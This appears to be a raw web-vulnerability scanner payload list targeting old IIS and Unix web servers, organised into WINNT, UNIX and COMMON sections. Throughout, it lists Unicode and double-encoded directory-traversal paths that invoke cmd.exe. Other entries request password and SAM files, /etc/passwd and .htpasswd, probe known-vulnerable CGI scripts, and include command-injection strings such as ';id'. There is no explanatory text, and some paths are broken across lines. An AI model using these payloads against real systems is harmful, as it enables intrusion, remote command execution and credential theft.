/samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?

/c+dir
/samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/samples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/script/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/

c+dir
/script/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.ex

e?/c+dir
/script/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/script/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?

/c+dir
/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.e

xe?/c+dir
/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c%20dir%20C:\

[/IIS-UTFCODE]

[CGI-LIST]

[WINNT]
/."./."./winnt/win.ini%20.php3
/...................../config.sys
/..................../boot.ini
/.................../boot.ini
/................../boot.ini
/................./boot.ini
/................/boot.ini
/.............../boot.ini
/............../boot.ini
/............./boot.ini
/............/boot.ini
/.........../boot.ini
/........../autoexec.bat
/........../boot.ini
/........./boot.ini
/......../boot.ini
/......./boot.ini
/....../
/....../ all
/....../autoexec.bat
/....../boot.ini
/....../config.sys
/...../boot.ini
/..../boot.ini
/..../config.sys
/..../Windows/Admin.pwl
/.../boot.ini
/../../../../ all
/../../../../../../../../boot.ini
/../../../../../../../boot.ini
/../../../../../../boot.ini
/../../../../../../Scandisk.log
/../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../boot.ini
/../../../../config.sys
/../../../autoexec.bat
/../../../boot.ini
/../../../scandisk.log
/../../boot.ini
/../../windows/user.dat
/../../winnt/win.ini
/../boot.ini
/..\..\..\..\..\..\autoexec.bat
/..\..\..\..\..\autoexec.bat
/..\..\..\..\autoexec.bat
/..\..\..\autoexec.bat
/..\..\..\winnt\repair\sam._
/..\..\autoexec.bat
/..\\..\\..\\..\\..\\..\autoexec.bat
/..\\..\\..\winnt\repair\sam._
/.html/............*/config.sys
/.html/............./config.sys
/.html/............/autoexec.bat
/.jsp/WEB-INF/classes/Env.java
/.nsf/../winnt/win.ini
/?PageServices
/\../boot.ini
/\../config.sys
/\../readme.txt
/_AuthChangeUrl
/_AuthChangeUrl?
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir
/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir
/_private
/_private/form_results.txt
/_private/orders.txt
/_private/register.txt
/_private/registrations.txt
/_private/shopping_cart.mdb
/_vti_adm/admin.dll
/_vti_bin
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir
/_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/_vti_bin/.._../winnt/system32/cmd.exe?/c+dir
/_vti_bin/_vti_adm
/_vti_bin/_vti_aut
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe
/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
/_vti_bin/fpexe
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/_vti_rpc
/_vti_bin/shtml.dll/nosuch.htm
/_vti_bin/shtml.exe
/_vti_inf.html
/_vti_log
/_vti_pvt
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/doctodep.btr
/_vti_pvt/service.grp
/_vti_pvt/service.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_vti_txt
/a.asp/..\../..\../winnt/repair/sam
/a.jsp//..//..//..//..//..//../winnt/win.ini
/abczxv.htw
/Admin_files/order.log
/admisapi/
/admisapi/fpadmin.htm
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=64

0&start=0
/app.cfm
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/autoexec.bat
/bdir.htr
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl
/bin/scripts/../../../../winnt/system32/cmd.exe
/c+dir?/c+dir%20c:\
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
/bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/bin/scripts/.._../winnt/system32/cmd.exe?/c+dir
/bin/scripts/openvendor/gnete/RetrievePNBody.asp
/blabla.idq
/carbo.dll
/catalog.nsf
/catalog.nsf/
/cfappman/index.cfm
/cfcache.map
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/ExprCalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/viewexample.cfm
/cfide/administrator/index.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgi/
/cgibin
/cgi-bin
/cgi-bin/
/cgi-bin/../../../../winnt/system32/cmd.exe
/cgi-bin/..\..\..\../winnt/system32/cmd.exe
/cgi-bin/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\

/cgi-bin/.._../winnt/system32/cmd.exe?/c+dir
/cgi-bin/_vti_cnf
/cgi-bin/alibaba.pl
/cgi-bin/bb-hostsvc.sh
/cgi-bin/c32web.exe/CheckError?error=53
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/ceilidh.exe
/cgi-bin/cgitest.exe
/cgi-bin/changepw.exe
/cgi-bin/echo.bat
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/fpexplorer.exe
/cgi-bin/get32.exe
/cgi-bin/get32.exe\dir
/cgi-bin/guestbook.cgi
/cgi-bin/GW5
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/GWWEB.EXE
/cgi-bin/hello.bat
/cgi-bin/htimage.exe
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin/iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/lsindex2.bat
/cgi-bin/mailform.exe
/cgi-bin/perl.exe
/cgi-bin/post32.exe
/cgi-bin/ppdscgi.exe
/cgi-bin/redirect.exe
/cgi-bin/rguest.exe
/cgi-bin/sam._
/cgi-bin/scripts/perl.exe
/cgi-bin/search97.vts
/cgi-bin/shop.cgi
/cgi-bin/shopper.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/statsconfig.pl
/cgi-bin/test.bat
/cgi-bin/test.cgi
/cgi-bin/tst.bat
/cgi-bin/tst.bat\dir
/cgi-bin/visadmin.exe
/cgi-bin/visadmin.exe?user=guest
/cgi-bin/visitor.exe
/cgi-bin/wconsole.dll
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/webplus.exe
/cgi-bin/wguest.exe
/cgi-bin/windmail.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-shl/win-c-sample.exe
/cgi-win
/cgi-win/perl.exe
/cgi-win/uploader.exe
/cgi-win/wguest.exe
/cgi-win/wincgi.bat
/cmd.exe?/c+dir%20c:\
/com1
/com2
/com3
/com4
/common/browser.inc
/con/con
/config/checks.txt
/config/import.txt
/config/mountain.cfg
/config/orders.txt
/cpqlogin.htm
/default.asp
/default.asp%2e
/default.asp%2e%41sp
/default.asp%81
/default.asp.
/default.asp::$DATA
/default.asp\\
/default.asp+.htr
/doc
/enter_bug.cgi
/ex/jsp/simple.jsp.
/file/index.jsp
/getfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\\WINNT\\repair\\sam._

/global.asa+.htr
/head.css
/hosts.dat
/iisadmin
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisamples/Sdk
/iishelp/iis/misc/iirturnh.htw
/iissamples
/iissamples/Default
/iissamples/ExAir
/iissamples/exair/howitworks/code.asp
/iissamples/exair/howitworks/codebrws.asp
/iissamples/exair/howitworks/showcode.asp
/iissamples/exair/search/advsearch.asp
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config

/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/query.idq
/IISSAMPLES/ExAir/Search/search.asp
/iissamples/exair/search/search.idq
/iissamples/iissamples/query.asp
/iissamples/ISSamples
/iissamples/issamples/fastq.idq
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/confi

g/system.log&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/query.asp
/iissamples/issamples/query.idq
/iissamples/sdk/asp/docs/codebrws.asp
/include/css.css
/include/head.html
/index.asp%2e
/index.asp%2e%41sp
/index.asp%81
/index.asp.
/index.asp::$DATA
/index.asp\\
/index.asp+.htr
/index.JSP
/index.php3.%5c../..%5cconf/httpd.conf
/isapi/tstisapi.dll
/login.asp%3F+.htr
/main.asp%2e
/main.asp%2e%41sp
/main.asp%81
/main.asp.
/main.asp::$DATA
/main.asp\\
/main.asp+.htr
/msadc
/msadc/../../../../winnt/system32/cmd.exe?/c+dir
/msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir
/msadc/..\../..\../..\../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir
/msadc/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/msadc/.._../winnt/system32/cmd.exe?/c+dir
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/Samples/SELECTOR/codebrws.cfm
/msadc/samples/selector/showcode.asp
/msadc/samples/selector/showcode.asp_2
/nofile.pl
/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full

/null.ida
/null.idc
/null.idq
/officescan/cgi/jdkRqNotify.exe
/ows-bin/perlidlc.bat?&dir
/passwd
/passwd.txt
/password
/password.dat
/password.log
/password.txt
/pbserver/
/pbserver/pbserver.dll
/private
/process_bug.cgi
/Proxy/LoginResponse
/rightfax/fuwww.dll
/rightfax/fuwww.dll/
/robots.txt
/sample.asp
/samples/search/queryhit.htm
/script/.._../winnt/system32/cmd.exe?/c+dir
/scripts
/scripts/
/scripts/*
/scripts/*.pl
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir
/scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/../../cmd.exe
/scripts/../../winnt/system32/cmd.exe?/c+dir
/scripts/..\../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir
/scripts/..\..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\
/scripts/.._../winnt/system32/cmd.exe?/c+dir
/scripts/bbs.pl%3F+.htr
/scripts/c32web.exe
/scripts/c32web.exe/Changeadmin passwordword
/scripts/Carello/add.exe
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cgimail.exe
/scripts/CGImail.exe
/scripts/cmd.exe
/scripts/cmd.exe?/c+dir%20c:\
/scripts/cmd32.exe
/scripts/cmd32.exe?/c+dir
/scripts/convert.bas
/scripts/counter.exe
/scripts/cpshost.dll
/scripts/dbman/db.cgi?db=invalid-db
/scripts/dmailweb.exe
/scripts/dnewsweb.exe
/scripts/emurl/RECMAN.dll
/scripts/environ.pl
/scripts/Fpadmcgi.exe
/scripts/fpcount.exe
/scripts/gupcgi.exe
/scripts/htimage.exe
/scripts/iisadmin
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/default.htm
/scripts/iisadmin/ism.dll
/scripts/iisadmin/ism.dll?http/dir
/scripts/iisadmin/samples
/scripts/iisadmin/tools
/scripts/iisadmin/tools/ctss.idc
/scripts/iisadmin/tools/getdrvrs.exe
/scripts/iisadmin/tools/mkilog.exe
/scripts/IISADMPWD
/scripts/issadmin/bdir.htr
/scripts/lsass.exe
/scripts/no-such-file.pl
/scripts/perl
/scripts/pfieffer.bat
/scripts/pfieffer.cmd
/scripts/postinfo.asp
/scripts/proxy/w3proxy.dll
/scripts/repost.asp
/scripts/rguest.exe
/scripts/samples
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/samples/search/author.idq
/scripts/samples/search/filesize.idq
/scripts/samples/search/filetime.idq
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/scripts/samples/search/query.idq
/scripts/samples/search/queryhit.idq
/scripts/samples/search/simple.idq
/scripts/samples/search/webhits.exe
/scripts/slxweb.dll
/scripts/srchadm/webhits.exe
/scripts/tools
/scripts/tools/dsnform.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/getdrvs.exe
/scripts/tools/mkilog.exe
/scripts/tools/newdsn.exe
/scripts/tools/uploadn.asp
/scripts/tools/uploadx.asp
/scripts/upload.asp
/scripts/uploadn.asp
/scripts/uploadx.asp
/scripts/visadmin.exe
/scripts/wa.exe
/scripts/webbbs.exe
/scripts/wguest.exe
/scripts/wsisa.dll
/search
/search.dll?search?query=%00&logic=AND
/search.dll?search?query=/&logic=AND
/search97.vts
/secure/.htaccess
/secure/.wwwacl
/server-info
/server-status
/servlet/SessionServlet
/session/adminlogin
/showfile.asp
/smdata.dat
/srchadm
/ssi/envout.bat
/today.nsf
/tree.dat
/user.dat
/user.log
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/WebShop/templates/cc.txt
/ws_ftp.ini
/wwwboard.pl
/wwwboard/passwd.txt
\\../readme.txt
[/WINNT]

[UNIX]
/../../../../../etc/passwd
/../../../../etc/passwd
/../../../etc/passwd
/../../etc/passwd
/../../passwd
/../../shadow
/.htaccess/
/.htpasswd/
/.jpilot/
//WEB-INF/
/accept/
/access.log
/access-log
/acid/
/acid/acid_main.php
/admin.php3?admin=anything
/admin/
/administrator/
/adminlogin?RCpage=/sysadmin/index.stm
/adpassword.txt
/backup/
/banners.php?op=Change
/bbs/

/bbs/admin/
/bbs/admin/config/
/bbs/data/
/bbs/db/
/bbs/include/
/cache-stats/
/card/
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd

/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._

/cgi-auth/userreg.cgi
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/ad.cgi
/cgi-bin/adcycle
/cgi-bin/admin/admin
/cgi-bin/aglimpse
/cgi-bin/allmanage.pl
/cgi-bin/allmanageup.pl
/cgi-bin/amlite/amadmin.pl
/cgi-bin/anacondaclip.pl?template=check
/cgi-bin/Anyform2
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/auktion.pl
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/bb-hist.sh
/cgi-bin/bbs_forum.cgi
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/Board/db/
/cgi-bin/build.cgi
/cgi-bin/cached_feed.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/cal_make.pl
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cgiforum.pl
/cgi-bin/cgiwrap
/cgi-bin/changepw.cgi
/cgi-bin/classifieds.cgi
/cgi-bin/commerce.cgi?page=check
/cgi-bin/Count.cgi
/cgi-bin/counterfiglet/nc/f
/cgi-bin/CrazyWWWBoard.cgi
/cgi-bin/cvsweb/cvsweb.cgi
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/dcadmin.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/dcforumlib.pl
/cgi-bin/dmailweb.cgi
/cgi-bin/dnewsweb.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/edit.pl
/cgi-bin/empower?DB=UkRteamHole
/cgi-bin/environ.cgi
/cgi-bin/everythingform.cgi
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/formmail.cgi
/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id
/cgi-bin/getdoc.cgi
/cgi-bin/glimpse
/cgi-bin/global.cgi
/cgi-bin/guestbook.pl
/cgi-bin/handler
/cgi-bin/hsx.cgi
/cgi-bin/htgrep
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin/htsearch?config=aaa
/cgi-bin/ikonboard/help.cgi
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/ipf/etc/gfw/ui/pwd.dat
/cgi-bin/jj
/cgi-bin/lasso.cgi
/cgi-bin/loadpage.cgi
/cgi-bin/mailfile.cgi
/cgi-bin/mailform.pl
/cgi-bin/maillist.pl
/cgi-bin/mailnews.cgi
/cgi-bin/mailto.cgi
/cgi-bin/man.sh
/cgi-bin/mdma.bat
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
/cgi-bin/netauth.cgi
/cgi-bin/news/news.cgi
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/pagelog.cgi
/cgi-bin/pals-cgi
/cgi-bin/perl
/cgi-bin/perlshop.cgi
/cgi-bin/pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject

=&replyto=0
/cgi-bin/post-query
/cgi-bin/processit.pl
/cgi-bin/query
/cgi-bin/redirect.cgi
/cgi-bin/register.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/responder.cgi
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin/s.cgi?q=a&tmpl=check
/cgi-bin/scripts/whois.cgi?action=load&whois=check
/cgi-bin/search.cgi?letter=
/cgi-bin/Search.pl
/cgi-bin/search/tidfinder.cgi?2956734
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/ssi
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/subscribe.pl
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/textcounter.pl
/cgi-bin/ultraboard.cgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload_file.pl
/cgi-bin/ustorekeeper.pl
/cgi-bin/view_page.html
/cgi-bin/view-source
/cgi-bin/w3-msql
/cgi-bin/wais.pl
/cgi-bin/webdata.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webdriver
/cgi-bin/webgais
/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
/cgi-bin/websendmail
/cgi-bin/webspirs.cgi
/cgi-bin/webwho.pl
/cgi-bin/whois_raw.cgi
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/Xrun.cgi
/cgi-bin/YaBB.pl
/cgi-bin-sdb
/class/mysql.class
/config/
/ConsoleHelp/login.jsp
/customer/
/data/
/database/
/databases/
/db/
/dbase/
/deny/
/devel/
/docs/
/document/
/documents/
/domcfg.nsf
/domlog.nsf
/down/
/download/
/downloads/
/example/
/examples/applications/bboard/bboard_frames.html
/examples/jsp/num/numguess.js%70
/exec/show/config/cr
/file/
/files/
/forum/
/forum/common.php
/ftp/
/girl/
/girls/
/hire/
/htdocs/
/html/snort2html.html
/idea/
/ideas/
/image/
/images/
/img/
/inc/
/inc/sendmail.inc
/include/
/include/inc/
/includes/
/includes/global.inc
/incoming/
/index.html.bak
/index.html~
/index.js%2570
/index.php.bak
/index.php~
/index.php3?vhosts[test]=
/install/
/lib/
/library/
/linux/
/log.htm
/log.html
/log.nsf
/log.txt
/log/
/logfile
/logfile.htm
/logfile.html
/logfile.txt
/logfile/
/logfiles/
/logger.html
/logger/
/logging/
/login.jsp
/logs/
/logs/access_log
/manage/cgi/cgiproc
/manual/
/misc/
/mp3/
/mrtg/
/msql/
/mysql/
/names.nsf
/ncl_items.html?SUBJECT=2097
/Newuser?Image=../../database/rbsserv.mdb
/number/
/opendir.php?requesturl=/etc/passwd
/pccsmysqladm/incs/dbconnect.inc
/pds/
/perl
/phone/
/phorum/common.php
/php/
/php3/
/php4/
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpPhotoAlbum/explorer.php
/piranha/secure/passwd.php3
/porno/
/ports/
/private/
/private/.htpasswd
/program/
/programming/
/programs/
/pservlet.html
/PSUser/PSCOErrPage.htm
/public/
/ROADS/cgi-bin/search.pl
/sawmill
/scancfg.cgi
/scripts/dbman/db.cgi
/scripts/submit.cgi
/search97cgi/vtopic
/secret/
/secret/secret/add-user.shmtl
/secret/secret/change-passwd.shtml
/secret/secret/sql_tool.shtml
/secrets/
/server_stats/
/server-info/
/server-status/
/servlet/com.livesoftware.jrun.plugins.jsp.JSP
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
/servlet/com.unify.ewave.servletexec.UploadServlet
/set/
/setpasswd.cgi
/setting/
/setup/
/sex/
/site/eg/source.asp
/snmp/
/snort2html.html
/source/
/sources/
/sql/
/stat.htm
/stat/
/statistics/
/stats.htm
/stats.html
/stats.txt
/Stats/
/stats/
/submit.php?CONF=anything
/subscribe.pl?test@test.com
/survey
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../ma

in.cgi
/technote/print.cgi
/telephone/
/temp/
/temporary/
/test/
/test/test.cgi
/tool/
/tools/
/ultraboard.pl
/usage/
/user.php&op=saveuser
/users/scripts/submit.cgi
/way-board/way-board.cgi
/webaccess.htm
/weblog/
/weblogs/
/webstats/
/work/
/WSFTP.LOG
/wstats/
/wwwlog/
/wwwstats.html
/wwwstats/
[/UNIX]

[COMMON]
/admin-serv/config/admpw
/cfappman/
/cfdocs/
/cfdocs/cfcache.map
/cfdocs/exampleapp/
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/snippets/
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/cfide/
/cfide/Administrator/
/cfide/Administrator/startstop.html
/cgi-bin/dbmlparser.exe
/getFile.cfm
/page.cfm
/publisher
[/COMMON]
----------
----------

/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:/InetPub/scripts/_private/+%23%23c0+%23%23ae+%23%23c0+%23%23ae/temp/
